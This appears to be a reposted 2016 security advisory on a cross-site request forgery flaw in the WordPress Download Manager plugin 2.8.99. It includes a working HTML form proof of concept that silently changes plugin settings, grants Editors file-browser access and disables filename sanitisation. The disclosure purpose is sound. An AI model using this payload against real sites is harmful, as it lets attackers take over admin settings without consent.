WordPress Download Manager 2.8.99 Cross Site Request Forgery

2017.03.03
Credit: Burak Kelebek
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

------------------------------------------------------------------------ Cross-Site Request Forgery in WordPress Download Manager Plugin ------------------------------------------------------------------------ Burak Kelebek, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Request Forgery vulnerability has been found in the WordPress Download Manager Plugin. By using this vulnerability an attacker can change confidential settings of the plugin. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160722-0005 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on WordPress Download Manager version 2.8.99. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ There is currently no fix available. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_download_manager_plugin.html The Download Manager plugin lacks a CSRF (nonce) token on the request of saving settings. Because of this an attacker is able to change confidential settings like file browser access and browser base dir by luring a logged-in admin to follow a malicious link containing the proof of concept below. Proof of concept The proof of concept below gives file browser access to a user with Editor privileges: <html> <body> <form action="http://<target>/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="task" value="wdm_save_settings"/> <input type="hidden" name="action" value="wdm_settings"/> <input type="hidden" name="section" value="basic"/> <input type="hidden" name="wpdm_permission_msg" value="Access Denied"/> <input type="hidden" name="wpdm_login_msg" value="<a href='http://<target>/wp-login.php'>Please login to download</a> "/> <input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-default/"/> <input type="hidden" name="_wpdm_file_browser_access[]" value="editor"/> <input type="hidden" name="_wpdm_file_browser_access[]" value="administrator"/> <input type="hidden" name="__wpdm_sanitize_filename" value="0"/> <input type="hidden" name="__wpdm_download_speed" value="4096"/> <input type="hidden" name="__wpdm_download_resume" value="1"/> <input type="hidden" name="__wpdm_support_output_buffer" value="1"/> <input type="hidden" name="__wpdm_open_in_browser" value="0"/> <input type="hidden" name="_wpdm_recaptcha_site_key" value=""/> <input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/> <input type="hidden" name="__wpdm_disable_scripts[]" value=""/> <input type="hidden" name="__wpdm_login_url" value=""/> <input type="hidden" name="__wpdm_register_url" value=""/> <input type="hidden" name="__wpdm_user_dashboard" value=""/> <input type="submit"/> </form> </body> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top